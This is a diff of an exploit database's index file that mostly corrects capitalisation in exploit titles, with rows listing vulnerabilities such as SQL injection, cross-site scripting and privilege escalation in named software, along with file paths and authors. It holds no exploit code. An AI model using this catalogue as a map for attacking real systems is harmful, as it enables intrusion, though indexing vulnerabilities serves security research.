35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 -35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 +35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 -35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 +35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (32/64 bit) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0 @@ -32280,7 +32283,7 @@ id,file,description,date,author,platform,type,port 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 -35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 +35823,platforms/php/webapps/35823.txt,"WordPress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 @@ -32289,28 +32292,28 @@ id,file,description,date,author,platform,type,port 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 -35830,platforms/php/webapps/35830.txt,"Multiple Wordpress WooThemes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 +35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 -35835,platforms/php/webapps/35835.txt,"Wordpress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 +35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 - 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 -35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0 +35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0 35993,platforms/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35994,platforms/windows/local/35994.c,"BullGuard Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 -35846,platforms/php/webapps/35846.txt,"Wordpress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 -35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 -35848,platforms/osx/local/35848.c,"OS X 10.9.5 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 -35849,platforms/osx/dos/35849.c,"OS X 10.10 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 +35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 +35847,platforms/osx/local/35847.c,"Apple Mac OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 +35848,platforms/osx/local/35848.c,"Apple Mac OS X 10.9.5 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 +35849,platforms/osx/dos/35849.c,"Apple Mac OS X 10.10 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Privilege Escalation",2011-06-13,"Todor Donev",windows,local,0 35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 @@ -32324,7 +32327,7 @@ id,file,description,date,author,platform,type,port 35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80 35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0 35862,platforms/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 -35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",php,webapps,0 +35863,platforms/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",php,webapps,0 35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 35865,platforms/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,php,webapps,0 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 @@ -32339,8 +32342,8 @@ id,file,description,date,author,platform,type,port 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 -35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 -35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 +35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps,0 +35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 @@ -32354,10 +32357,10 @@ id,file,description,date,author,platform,type,port 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",multiple,remote,0 -35893,platforms/php/webapps/35893.txt,"Wordpress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps,0 +35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps,0 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 -35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 +35896,platforms/php/webapps/35896.txt,"Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection",2015-01-26,Vulnerability-Lab,php,webapps,0 @@ -32376,18 +32379,18 @@ id,file,description,date,author,platform,type,port 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 -35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 +35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 -35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 +35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 -35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 +35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 @@ -32399,7 +32402,7 @@ id,file,description,date,author,platform,type,port 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 -35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass",2015-01-29,"Amplia Security Research",osx,local,0 +35934,platforms/osx/local/35934.txt,"Apple Mac OS X < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 @@ -32408,13 +32411,13 @@ id,file,description,date,author,platform,type,port 35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - admin/help.php Multiple Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 -35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/javascript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 +35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/JavaScript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 -35950,platforms/php/webapps/35950.txt,"NPDS CMS Revolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 +35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 @@ -32434,7 +32437,7 @@ id,file,description,date,author,platform,type,port 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 -35971,platforms/php/webapps/35971.txt,"Wordpress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 +35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injections",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 @@ -32445,29 +32448,29 @@ id,file,description,date,author,platform,type,port 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,php,webapps,0 -36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 +36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Parameter URI redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 36004,platforms/multiple/remote/36004.txt,"Skype 5.3 - 'Mobile Phone' Field HTML Injection",2011-08-01,noptrix,multiple,remote,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36006,platforms/multiple/remote/36006.java,"Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass",2011-08-02,"Roee Hay",multiple,remote,0 -36007,platforms/multiple/dos/36007.txt,"AzeoTech DAQFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 +36007,platforms/multiple/dos/36007.txt,"AzeoTech DaqFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 36008,platforms/php/webapps/36008.txt,"Gilnet News - 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps,0 36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0 -36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 +36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit",2015-02-07,"Todor Donev",hardware,remote,0 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"Wordpress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"WordPress WP E-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (PoC)",2015-02-09,"Samandeep Singh",windows,dos,0 -36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 +36023,platforms/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption",2015-02-08,"Pablo González",linux,dos,0 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0 @@ -32475,38 +32478,38 @@ id,file,description,date,author,platform,type,port 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 -36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 Plugin - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 +36058,platforms/php/webapps/36058.txt,"WordPress Video Gallery 2.7.0 Plugin - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 -36038,platforms/php/webapps/36038.txt,"Wordpress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 +36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 -36043,platforms/php/webapps/36043.rb,"Wordpress WP EasyCart Plugin - Unrestricted File 